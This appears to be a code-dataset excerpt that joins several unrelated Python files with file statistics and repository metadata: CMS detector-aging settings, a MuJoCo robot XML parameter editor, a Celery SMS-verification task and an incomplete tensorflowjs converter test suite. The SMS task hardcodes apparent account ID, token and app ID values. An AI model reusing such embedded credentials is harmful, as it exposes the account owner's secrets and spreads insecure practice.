# functions to enable individual subdet aging
process = ageHB(process,True,scenarioHLLHC)
process = ageHE(process,True,scenarioHLLHC)
process = ageHF(process,True)
process = ageSiPM(process,True,lumi)
return process
def turn_on_HB_aging(process):
process = ageHB(process,True,"")
return process
def turn_off_HB_aging(process):
process = ageHB(process,False,"")
return process
def turn_on_HE_aging(process):
process = ageHE(process,True,"")
return process
def turn_off_HE_aging(process):
process = ageHE(process,False,"")
return process
def turn_on_HF_aging(process):
process = ageHF(process,True)
return process
def turn_off_HF_aging(process):
process = ageHF(process,False)
return process
def turn_off_SiPM_aging(process):
process = ageSiPM(process,False,0.0)
return process
def hf_complete_aging(process):
if hasattr(process,'g4SimHits'):
process.g4SimHits.HCalSD.HFDarkening = cms.untracked.bool(True)
hcaldigi = getHcalDigitizer(process)
if hcaldigi is not None: hcaldigi.HFDarkening = cms.untracked.bool(False)
return process
def ageEcal(process,lumi,instLumi):
if hasattr(process,'g4SimHits'):
#these lines need to be further activiated by tuning on 'complete' aging for ecal
process.g4SimHits.ECalSD.InstLuminosity = cms.double(instLumi)
process.g4SimHits.ECalSD.DelivLuminosity = cms.double(float(lumi))
# available conditions
ecal_lumis = [300,1000,3000,4500]
ecal_conditions = [
['EcalIntercalibConstantsRcd','EcalIntercalibConstants_TL{:d}_upgrade_8deg_v2_mc'],
['EcalIntercalibConstantsMCRcd','EcalIntercalibConstantsMC_TL{:d}_upgrade_8deg_v2_mc'],
['EcalLaserAPDPNRatiosRcd','EcalLaserAPDPNRatios_TL{:d}_upgrade_8deg_mc'],
['EcalPedestalsRcd','EcalPedestals_TL{:d}_upgradeTIA_8deg_mc'],
['EcalTPGLinearizationConstRcd','EcalTPGLinearizationConst_TL{:d}_upgrade_8deg_mc'],
]
# update PF thresholds, based on https://indico.cern.ch/event/653123/contributions/2659235/attachments/1491385/2318364/170711_upsg_ledovskoy.pdf
ecal_thresholds = {
300 : 0.103,
1000 : 0.175,
3000 : 0.435,
4500 : 0.707,
}
ecal_seed_multiplier = 2.5
# try to get conditions
if int(lumi) in ecal_lumis:
if not hasattr(process.GlobalTag,'toGet'):
process.GlobalTag.toGet=cms.VPSet()
for ecal_condition in ecal_conditions:
process.GlobalTag.toGet.append(cms.PSet(
record = cms.string(ecal_condition[0]),
tag = cms.string(ecal_condition[1].format(int(lumi))),
connect = cms.string("frontier://FrontierProd/CMS_CONDITIONS")
)
)
if hasattr(process,"particleFlowClusterECALUncorrected"):
_seeds = process.particleFlowClusterECALUncorrected.seedFinder.thresholdsByDetector
for iseed in range(0,len(_seeds)):
if _seeds[iseed].detector.value()=="ECAL_BARREL":
_seeds[iseed].seedingThreshold = cms.double(ecal_thresholds[int(lumi)]*ecal_seed_multiplier)
_clusters = process.particleFlowClusterECALUncorrected.initialClusteringStep.thresholdsByDetector
for icluster in range(0,len(_clusters)):
if _clusters[icluster].detector.value()=="ECAL_BARREL":
_clusters[icluster].gatheringThreshold = cms.double(ecal_thresholds[int(lumi)])
return process
def ecal_complete_aging(process):
if hasattr(process,'g4SimHits'):
process.g4SimHits.ECalSD.AgeingWithSlopeLY = cms.untracked.bool(True)
if hasattr(process,'ecal_digi_parameters'):
process.ecal_digi_parameters.UseLCcorrection = cms.untracked.bool(False)
return process
def customise_aging_300(process):
process=ageHcal(process,300,5.0e34,"nominal")
process=ageEcal(process,300,5.0e34)
return process
def customise_aging_1000(process):
process=ageHcal(process,1000,5.0e34,"nominal")
process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration
process=ageEcal(process,1000,5.0e34)
return process
def customise_aging_3000(process):
process=ageHcal(process,3000,5.0e34,"nominal")
process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration
process=ageEcal(process,3000,5.0e34)
process=agedHGCal(process)
process=agedHFNose(process)
return process
def customise_aging_3000_ultimate(process):
process=ageHcal(process,3000,7.5e34,"ultimate")
process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration
process=ageEcal(process,3000,7.5e34)
process=agedHGCal(process)
process=agedHFNose(process)
return process
def customise_aging_4500_ultimate(process):
process=ageHcal(process,4500,7.5e34,"ultimate")
process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration
process=ageEcal(process,4500,7.5e34)
process=agedHGCal(process)
process=agedHFNose(process)
return process
| 44.40146
| 176
| 0.715025
| 1,347
| 12,166
| 6.331106
| 0.213066
| 0.044207
| 0.0394
| 0.025797
| 0.504573
| 0.418386
| 0.355183
| 0.304526
| 0.268293
| 0.211069
| 0
| 0.033714
| 0.185681
| 12,166
| 273
| 177
| 44.564103
| 0.827092
| 0.088279
| 0
| 0.235294
| 0
| 0
| 0.083642
| 0.045344
| 0
| 0
| 0
| 0.003663
| 0
| 1
| 0.117647
| false
| 0
| 0.036199
| 0
| 0.298643
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
868de8e68215f41c7a22fbffe3549ae81cd16557
| 10,106
|
py
|
Python
|
xml_parser.py
|
cbschaff/nlimb
|
f0564b00bab1b3367aaa88163e49bebc88f349bb
|
[
"MIT"
] | 12
|
2018-10-26T19:33:05.000Z
|
2022-01-17T11:47:59.000Z
|
xml_parser.py
|
cbschaff/nlimb
|
f0564b00bab1b3367aaa88163e49bebc88f349bb
|
[
"MIT"
] | 9
|
2020-01-28T22:30:55.000Z
|
2022-03-11T23:32:04.000Z
|
xml_parser.py
|
cbschaff/nlimb
|
f0564b00bab1b3367aaa88163e49bebc88f349bb
|
[
"MIT"
] | 3
|
2019-07-09T14:56:01.000Z
|
2019-11-18T06:58:41.000Z
|
import numpy as np
import xml.etree.ElementTree as ET
class Geom(object):
def __init__(self, geom):
self.xml = geom
self.params = []
def get_params(self):
return self.params.copy()
def set_params(self, new_params):
self.params = new_params
def update_point(self, p, new_params):
pass
def update_xml(self):
pass
def update(self, new_params):
self.set_params(new_params)
self.update_xml()
def get_smallest_z(self):
pass
def get_param_limits(self):
pass
def get_param_names(self):
pass
def get_volume(self):
pass
class Sphere(Geom):
min_radius = .05
max_radius = .4
def __init__(self, geom):
self.xml = geom
self.params = [float(self.xml.get('size'))] # radius
self.center = np.array([float(x) for x in self.xml.get('pos').split()])
def update_point(self, p, new_params):
return ((p - self.center) * new_params[0] / self.params[0]) + self.center
def update_xml(self):
self.xml.set('size', str(self.params[0]))
def get_smallest_z(self):
return self.center[2] - self.params[0]
def get_param_limits(self):
return [[self.min_radius], [self.max_radius]]
def get_param_names(self):
return ['radius']
def get_volume(self):
return 4./3. * np.pi * self.params[0] ** 3
class Capsule(Geom):
min_length = 0.175
max_length = 0.8
min_radius = 0.035
max_radius = 0.085
def __init__(self, geom):
self.xml = geom
fromto = [float(x) for x in self.xml.get('fromto').split()]
self.p1 = np.array(fromto[:3])
self.p2 = np.array(fromto[3:])
length = np.sqrt(np.sum((self.p2 - self.p1) ** 2))
radius = float(self.xml.get('size'))
self.params = [length, radius]
self.axis = (self.p2 - self.p1) / length
def update_point(self, p, new_params):
lfac = p.dot(self.axis) * self.axis
rfac = p - lfac
return p + lfac * (-1.0 + new_params[0] / self.params[0])# + rfac * (new_params[1] / self.params[1])
def update_xml(self):
self.xml.set('fromto', ' '.join([str(x) for x in np.concatenate([self.p1, self.p2])]))
self.xml.set('size', str(self.params[1])) # radius
def set_params(self, new_params):
p1 = self.update_point(self.p1, new_params)
p2 = self.update_point(self.p2, new_params)
# update only after computing p1, p2
self.p1 = p1
self.p2 = p2
super().set_params(new_params)
def get_smallest_z(self):
return min(self.p1[2], self.p2[2]) - self.params[1]
def get_param_limits(self):
return [[self.min_length, self.min_radius], [self.max_length, self.max_radius]]
def get_param_names(self):
return ['length','radius']
def get_volume(self):
return 4./3. * np.pi * self.params[1]**3 + self.params[0] * np.pi * self.params[1]**2
class Body:
geoms = {'sphere': Sphere, 'capsule': Capsule} # dictionary of legal geometry types
def __init__(self, body, worldbody=False):
self.xml = body
self.worldbody = worldbody
geom_xml = body.find('geom') # assume only one geometry per body
self.geom = self.geoms[geom_xml.get('type')](geom_xml)
self.joints = [j for j in body.findall('joint') if 'ignore' not in j.get('name')]
self.parts = [Body(b) for b in body.findall('body')]
pos = [b.get('pos') for b in body.findall('body')]
self.part_positions = [np.array([float(x) for x in p.split()]) for p in pos]
pos = [j.get('pos') for j in self.joints]
self.joint_positions = [np.array([float(x) for x in p.split()]) for p in pos]
self.n = len(self.geom.get_params())
self.n_all_params = len(self.get_params())
self.zmin = float(self.xml.get("pos").split()[2]) - self.get_height()
def get_height(self):
max_height = -self.geom.get_smallest_z()
for body, pos in zip(self.parts, self.part_positions):
max_height = max(max_height, body.get_height() - pos[2])
return max_height
def update_initial_position(self):
pos = self.xml.get("pos").split()
pos[2] = str(self.get_height() + self.zmin)
self.xml.set("pos", ' '.join(pos))
def update_xml(self):
for body, pos in zip(self.parts, self.part_positions):
body.xml.set('pos', ' '.join([str(x) for x in pos]))
for joint, pos in zip(self.joints, self.joint_positions):
joint.set('pos', ' '.join([str(x) for x in pos]))
def set_body_positions(self, new_params):
for i, pos in enumerate(self.part_positions):
self.part_positions[i] = self.geom.update_point(pos, new_params)
for i, pos in enumerate(self.joint_positions):
self.joint_positions[i] = self.geom.update_point(pos, new_params)
def update(self, new_params):
self.set_body_positions(new_params)
self.geom.update(new_params)
self.update_xml()
def get_params(self):
params = self.geom.get_params()
for body in self.parts:
params += body.get_params()
return params
def get_param_limits(self):
limits = self.geom.get_param_limits()
for body in self.parts:
body_limits = body.get_param_limits()
limits[0] += body_limits[0]
limits[1] += body_limits[1]
return limits
def get_param_names(self):
name = self.xml.get('name')
param_names = [name + '-' + p for p in self.geom.get_param_names()]
for body in self.parts:
param_names += body.get_param_names()
return param_names
def update_params(self, new_params):
if self.worldbody: assert len(new_params) == self.n_all_params, "Wrong number of parameters"
self.update(new_params[:self.n])
remaining_params = new_params[self.n:]
for body in self.parts:
remaining_params = body.update_params(remaining_params)
if self.worldbody:
self.update_initial_position()
else:
return remaining_params
def get_body_names(self):
names = [self.xml.get('name')]
for body in self.parts:
names += body.get_names()
return names
def get_joints(self):
joints = {}
for body,pos in zip(self.parts, self.part_positions):
for j in body.joints:
joints[j.get('name')] = (self.xml.get('name'), body.xml.get('name'), self.geom, body.geom, pos)
joints.update(body.get_joints())
return joints
def get_volumes(self):
volumes = {}
if len(self.joints) > 0:
for j in self.joints:
v1 = self.geom.get_volume()
v2 = sum([b.geom.get_volume() for b in self.parts])
volumes[j.get('name')] = np.array((v1, v2))
for body in self.parts:
volumes.update(body.get_volumes())
return volumes
class MuJoCoXmlRobot:
def __init__(self, model_xml):
self.model_xml = model_xml
self.tree = ET.parse(self.model_xml)
worldbody = self.tree.getroot().find('worldbody')
self.body = Body(worldbody.find('body'), worldbody=True)
def get_params(self):
return self.body.get_params()
def get_param_limits(self):
return self.body.get_param_limits()
def get_param_names(self):
return self.body.get_param_names()
def get_height(self):
return self.body.get_height()
def get_joints(self):
return self.body.get_joints()
def get_volumes(self):
return self.body.get_volumes()
def update(self, params, xml_file=None):
if xml_file is None:
xml_file = self.model_xml
self.body.update_params(list(params))
self.tree.write(xml_file)
if __name__ == '__main__':
robot = MuJoCoXmlRobot('mujoco_assets/hopper.xml')
params = list(1.0 * np.array(robot.get_params()))
robot.update(params, 'mujoco_assets/hopper_test.xml')
assert robot.get_params() == params
#assert robot.get_height() == 1.31
print(robot.get_param_limits())
print(robot.get_param_names())
robot = MuJoCoXmlRobot('mujoco_assets/walker2d.xml')
params = [.4,.04,.5,.05,.55,.055,.6,.06,.5,.05,.55,.055,.6,.06]
robot.update(params, 'mujoco_assets/walker2d_test.xml')
assert robot.get_params() == params
assert robot.get_height() == 1.31
print(robot.get_param_limits())
print(robot.get_param_names())
robot = MuJoCoXmlRobot('mujoco_assets/ant.xml')
params = [.2, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06]
robot.update(params, 'mujoco_assets/ant_test.xml')
assert robot.get_params() == params
assert robot.get_height() == .2
print(robot.get_param_limits())
print(robot.get_param_names())
robot = MuJoCoXmlRobot('mujoco_assets/humanoid.xml')
params = list(.8 * np.array(robot.get_params()))
robot.update(params, 'mujoco_assets/humanoid_test.xml')
assert robot.get_params() == params
print(robot.get_height())
#assert robot.get_height() == .6085
print(robot.get_param_limits())
print(robot.get_param_names())
import gym, roboschool
env = gym.make("RoboschoolHopper-v1")
env.unwrapped.model_xml = 'mujoco_assets/hopper_test.xml'
env.reset()
#env.render()
import os
from scipy.misc import imsave
import subprocess as sp
outdir = 'xml_vid'
os.makedirs(outdir, exist_ok=True)
i = 0
for _ in range(10):
env.reset()
for _ in range(100):
env.step(env.action_space.sample())
rgb = env.render('rgb_array')
imsave(os.path.join(outdir, '{:05d}.png'.format(i)), rgb)
i+=1
sp.call(['ffmpeg', '-r', '60', '-f', 'image2', '-i', os.path.join(outdir, '%05d.png'), '-vcodec', 'libx264', '-pix_fmt', 'yuv420p', os.path.join(outdir, 'out.mp4')])
env.close()
| 33.574751
| 169
| 0.608351
| 1,449
| 10,106
| 4.069703
| 0.132505
| 0.026454
| 0.028489
| 0.024419
| 0.474818
| 0.374089
| 0.290487
| 0.224182
| 0.196201
| 0.149059
| 0
| 0.023403
| 0.247378
| 10,106
| 300
| 170
| 33.686667
| 0.751906
| 0.02355
| 0
| 0.306723
| 0
| 0
| 0.054981
| 0.02465
| 0
| 0
| 0
| 0
| 0.029412
| 1
| 0.193277
| false
| 0.02521
| 0.02521
| 0.067227
| 0.37395
| 0.037815
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
868f0e1cedcadcbc2d277dd9469765ca291fed6d
| 689
|
py
|
Python
|
meiduo_mall/celery_tasks/sms/tasks.py
|
Vent-Any/meiduo_mall_cangku
|
5b3b7f029be267cb5d2d3666f99be166d27213f1
|
[
"MIT"
] | null | null | null |
meiduo_mall/celery_tasks/sms/tasks.py
|
Vent-Any/meiduo_mall_cangku
|
5b3b7f029be267cb5d2d3666f99be166d27213f1
|
[
"MIT"
] | null | null | null |
meiduo_mall/celery_tasks/sms/tasks.py
|
Vent-Any/meiduo_mall_cangku
|
5b3b7f029be267cb5d2d3666f99be166d27213f1
|
[
"MIT"
] | null | null | null |
from ronglian_sms_sdk import SmsSDK
from celery_tasks.main import app
# 写我们的任务(函数)
# 任务必须要celery的实例对象装饰器task装饰
# 任务包的任务需要celery调用自检检查函数。(在main里面写。)
@app.task
def celery_send_sms_code(mobile, sms_code):
accId = '8a216da8762cb4570176c60593ba35ec'
accToken = '514a8783b8c2481ebbeb6a814434796f'
appId = '8a216da8762cb4570176c605948c35f2'
# 9.1. 创建荣联云 实例对象
sdk = SmsSDK(accId, accToken, appId)
tid = '1' # 我们发送短信的模板,值 只能是 1 因为我们是测试用户
mobile = '%s' % mobile # '手机号1,手机号2' 给哪些手机号发送验证码,只能是测试手机号
datas = (sms_code, 10) # ('变量1', '变量2') 涉及到模板的变量
# 您的验证码为{1},请于{2} 分钟内输入
# 您的验证码为666999,请于5 分钟内输入
# 9.2. 发送短信
sdk.sendMessage(tid, mobile, datas)
| 32.809524
| 65
| 0.703919
| 79
| 689
| 6.037975
| 0.670886
| 0.044025
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158645
| 0.185776
| 689
| 21
| 66
| 32.809524
| 0.691622
| 0.335269
| 0
| 0
| 0
| 0
| 0.220982
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.166667
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86920ec1c0159b8548b81683e13e218d1875aaf1
| 33,860
|
py
|
Python
|
python/test_pip_package.py
|
syt123450/tfjs-converter
|
a90fa59a44d9425beb7b1584fe753c62d62bbc4d
|
[
"Apache-2.0"
] | null | null | null |
python/test_pip_package.py
|
syt123450/tfjs-converter
|
a90fa59a44d9425beb7b1584fe753c62d62bbc4d
|
[
"Apache-2.0"
] | null | null | null |
python/test_pip_package.py
|
syt123450/tfjs-converter
|
a90fa59a44d9425beb7b1584fe753c62d62bbc4d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test the Python API and shell binary of the tensorflowjs pip package."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import json
import os
import shutil
import subprocess
import sys
import tempfile
import unittest
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import variables
from tensorflow.python.training.tracking import tracking
from tensorflow.python.saved_model.save import save
import tensorflow_hub as hub
import tensorflowjs as tfjs
def _createKerasModel(layer_name_prefix, h5_path=None):
"""Create a Keras model for testing.
Args:
layer_name_prefix: A prefix string for layer names. This helps avoid
clashes in layer names between different test methods.
h5_path: Optional string path for a HDF5 (.h5) file to save the model
in.
Returns:
An instance of keras.Model.
"""
input_tensor = keras.layers.Input((3, ))
dense1 = keras.layers.Dense(
4,
use_bias=True,
kernel_initializer='ones',
bias_initializer='zeros',
name=layer_name_prefix + '1')(input_tensor)
output = keras.layers.Dense(
2,
use_bias=False,
kernel_initializer='ones',
name=layer_name_prefix + '2')(dense1)
model = keras.models.Model(inputs=[input_tensor], outputs=[output])
if h5_path:
model.save(h5_path)
return model
def _createTensorFlowSavedModelV1(name_scope, save_path):
"""Create a TensorFlow SavedModel for testing.
Args:
name_scope: Name scope to create the model under. This helps avoid
op and variable name clashes between different test methods.
save_path: The directory path in which to save the model.
"""
graph = tf.Graph()
with graph.as_default():
with tf.compat.v1.name_scope(name_scope):
x = tf.compat.v1.constant([[37.0, -23.0], [1.0, 4.0]])
w = tf.compat.v1.get_variable('w', shape=[2, 2])
y = tf.compat.v1.matmul(x, w)
output = tf.compat.v1.nn.softmax(y)
init_op = w.initializer
# Create a builder.
builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(save_path)
with tf.compat.v1.Session() as sess:
# Run the initializer on `w`.
sess.run(init_op)
builder.add_meta_graph_and_variables(
sess, [tf.compat.v1.saved_model.tag_constants.SERVING],
signature_def_map={
"serving_default":
tf.compat.v1.saved_model.signature_def_utils.predict_signature_def(
inputs={"x": x},
outputs={"output": output})
},
assets_collection=None)
builder.save()
def _createTensorFlowSavedModel(name_scope, save_path):
"""Create a TensorFlow SavedModel for testing.
Args:
name_scope: Name scope to create the model under. This helps avoid
op and variable name clashes between different test methods.
save_path: The directory path in which to save the model.
"""
input_data = constant_op.constant(1., shape=[1])
root = tracking.AutoTrackable()
root.v1 = variables.Variable(3.)
root.v2 = variables.Variable(2.)
root.f = def_function.function(lambda x: root.v1 * root.v2 * x)
to_save = root.f.get_concrete_function(input_data)
save(root, save_path, to_save)
def _create_hub_module(save_path):
"""Create a TensorFlow Hub module for testing.
Args:
save_path: The directory path in which to save the model.
"""
# Module function that doubles its input.
def double_module_fn():
w = tf.Variable([2.0, 4.0])
x = tf.compat.v1.placeholder(dtype=tf.float32)
hub.add_signature(inputs=x, outputs=x*w)
graph = tf.Graph()
with graph.as_default():
spec = hub.create_module_spec(double_module_fn)
m = hub.Module(spec)
# Export the module.
with tf.compat.v1.Session(graph=graph) as sess:
sess.run(tf.compat.v1.global_variables_initializer())
m.export(save_path, sess)
class APIAndShellTest(tf.test.TestCase):
"""Tests for the Python API of the pip package."""
@classmethod
def setUpClass(cls):
cls.class_tmp_dir = tempfile.mkdtemp()
cls.tf_saved_model_dir = os.path.join(cls.class_tmp_dir, 'tf_saved_model')
cls.tf_saved_model_v1_dir = os.path.join(
cls.class_tmp_dir, 'tf_saved_model_v1')
_createTensorFlowSavedModel('a', cls.tf_saved_model_dir)
_createTensorFlowSavedModelV1('b', cls.tf_saved_model_v1_dir)
cls.tf_hub_module_dir = os.path.join(cls.class_tmp_dir, 'tf_hub_module')
_create_hub_module(cls.tf_hub_module_dir)
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.class_tmp_dir)
def setUp(self):
# Make sure this file is not being run from the source directory, to
# avoid picking up source files.
if os.path.isdir(
os.path.join(os.path.dirname(__file__), 'tensorflowjs')):
self.fail('Do not run this test from the Python source directory. '
'This file is intended to be run on pip install.')
self._tmp_dir = tempfile.mkdtemp()
super(APIAndShellTest, self).setUp()
def tearDown(self):
if os.path.isdir(self._tmp_dir):
shutil.rmtree(self._tmp_dir)
super(APIAndShellTest, self).tearDown()
def testVersionString(self):
self.assertEqual(2, tfjs.__version__.count('.'))
def testSaveKerasModel(self):
with self.test_session():
# First create a toy keras model.
model = _createKerasModel('MergedDense')
tfjs.converters.save_keras_model(model, self._tmp_dir)
# Briefly check the model topology.
with open(os.path.join(self._tmp_dir, 'model.json')) as f:
json_content = json.load(f)
model_json = json_content['modelTopology']
self.assertIsInstance(model_json['model_config'], dict)
self.assertIsInstance(model_json['model_config']['config'], dict)
self.assertIn('layers', model_json['model_config']['config'])
weights_manifest = json_content['weightsManifest']
self.assertIsInstance(weights_manifest, list)
# Briefly check the weights manifest.
weight_shapes = dict()
weight_dtypes = dict()
for manifest_item in weights_manifest:
for weight in manifest_item['weights']:
weight_name = weight['name']
weight_shapes[weight_name] = weight['shape']
weight_dtypes[weight_name] = weight['dtype']
self.assertEqual(
sorted(list(weight_shapes.keys())),
sorted([
'MergedDense1/kernel', 'MergedDense1/bias',
'MergedDense2/kernel'
]))
self.assertEqual(weight_shapes['MergedDense1/kernel'], [3, 4])
self.assertEqual(weight_shapes['MergedDense1/bias'], [4])
self.assertEqual(weight_shapes['MergedDense2/kernel'], [4, 2])
self.assertEqual(weight_dtypes['MergedDense1/kernel'], 'float32')
self.assertEqual(weight_dtypes['MergedDense1/bias'], 'float32')
self.assertEqual(weight_dtypes['MergedDense2/kernel'], 'float32')
def testLoadKerasModel(self):
# Use separate tf.Graph and tf.compat.v1.Session contexts to prevent name collision.
with tf.Graph().as_default(), tf.compat.v1.Session():
# First create a toy keras model.
model1 = _createKerasModel('MergedDense')
tfjs.converters.save_keras_model(model1, self._tmp_dir)
model1_weight_values = model1.get_weights()
with tf.Graph().as_default(), tf.compat.v1.Session():
# Load the model from saved artifacts.
model2 = tfjs.converters.load_keras_model(
os.path.join(self._tmp_dir, 'model.json'))
# Compare the loaded model with the original one.
model2_weight_values = model2.get_weights()
self.assertEqual(len(model1_weight_values), len(model2_weight_values))
for model1_weight_value, model2_weight_value in zip(
model1_weight_values, model2_weight_values):
self.assertAllClose(model1_weight_value, model2_weight_value)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(self._tmp_dir, 'group*-*')))
def testInvalidInputFormatRaisesError(self):
process = subprocess.Popen(
[
'tensorflowjs_converter', '--input_format',
'nonsensical_format', self._tmp_dir, self._tmp_dir
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertGreater(process.returncode, 0)
self.assertIn(b'--input_format', tf.compat.as_bytes(stderr))
def testMissingInputPathRaisesError(self):
process = subprocess.Popen(
[
'tensorflowjs_converter'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertGreater(process.returncode, 0)
self.assertIn(b'input_path', tf.compat.as_bytes(stderr))
def testKerasH5ConversionWorksFromCLI(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
# First create a toy keras model.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
_createKerasModel('MergedDenseForCLI', h5_path)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras', h5_path,
self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# Briefly check the model topology.
with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f:
json_content = json.load(f)
model_json = json_content['modelTopology']
self.assertIsInstance(model_json['model_config'], dict)
self.assertIsInstance(model_json['model_config']['config'], dict)
self.assertIn('layers', model_json['model_config']['config'])
weights_manifest = json_content['weightsManifest']
self.assertIsInstance(weights_manifest, list)
# Briefly check the weights manifest.
weight_shapes = dict()
weight_dtypes = dict()
for manifest_item in weights_manifest:
for weight in manifest_item['weights']:
weight_name = weight['name']
weight_shapes[weight_name] = weight['shape']
weight_dtypes[weight_name] = weight['dtype']
self.assertEqual(
sorted(list(weight_shapes.keys())),
sorted([
'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias',
'MergedDenseForCLI2/kernel'
]))
self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4])
self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4])
self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2])
self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32')
# Verify that there is only one weight group due to the default
# non-split_weights_by_layer behavior. The model is a small one, which
# does not exceed the 4-MB shard size limit. Therefore, there should
# be only one weight file.
self.assertEqual(
1, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))
def testKerasH5ConversionSplitWeightsByLayerWorksFromCLI(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
# First create a toy keras model.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
_createKerasModel('MergedDenseForCLI', h5_path)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras',
'--split_weights_by_layer', h5_path, self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# Briefly check the model topology.
with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f:
json_content = json.load(f)
model_json = json_content['modelTopology']
self.assertIsInstance(model_json['model_config'], dict)
self.assertIsInstance(model_json['model_config']['config'], dict)
self.assertIn('layers', model_json['model_config']['config'])
weights_manifest = json_content['weightsManifest']
self.assertIsInstance(weights_manifest, list)
# Briefly check the weights manifest.
weight_shapes = dict()
weight_dtypes = dict()
for manifest_item in weights_manifest:
for weight in manifest_item['weights']:
weight_name = weight['name']
weight_shapes[weight_name] = weight['shape']
weight_dtypes[weight_name] = weight['dtype']
self.assertEqual(
sorted(list(weight_shapes.keys())),
sorted([
'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias',
'MergedDenseForCLI2/kernel'
]))
self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4])
self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4])
self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2])
self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32')
# Verify that there are two weight groups due to the optional flag
# --split_weights_by_layer behavior. The model is a small one. None of
# the layers should have weight sizes exceeding the 4-MB shard size
# limit.
self.assertEqual(
2, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))
def testKerasH5ConversionWithSignatureNameErrors(self):
process = subprocess.Popen(
[
'tensorflowjs_converter', '--input_format', 'keras',
'--signature_name', 'bar',
os.path.join(self._tmp_dir, 'foo.h5'),
os.path.join(self._tmp_dir, 'output')
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertGreater(process.returncode, 0)
self.assertIn(
b'The --signature_name flag is applicable only to',
tf.compat.as_bytes(stderr))
def testConvertTFSavedModelV1WithCommandLineWorks(self):
output_dir = os.path.join(self._tmp_dir)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_saved_model',
'--output_format', 'tfjs_graph_model',
self.tf_saved_model_v1_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{'dtype': 'float32', 'name': 'w', 'shape': [2, 2]}]}]
# Load the saved weights as a JSON string.
output_json = json.load(
open(os.path.join(output_dir, 'model.json'), 'rt'))
self.assertEqual(output_json['weightsManifest'], weights)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTFHubModuleWithCommandLineWorks(self):
output_dir = os.path.join(self._tmp_dir)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_hub',
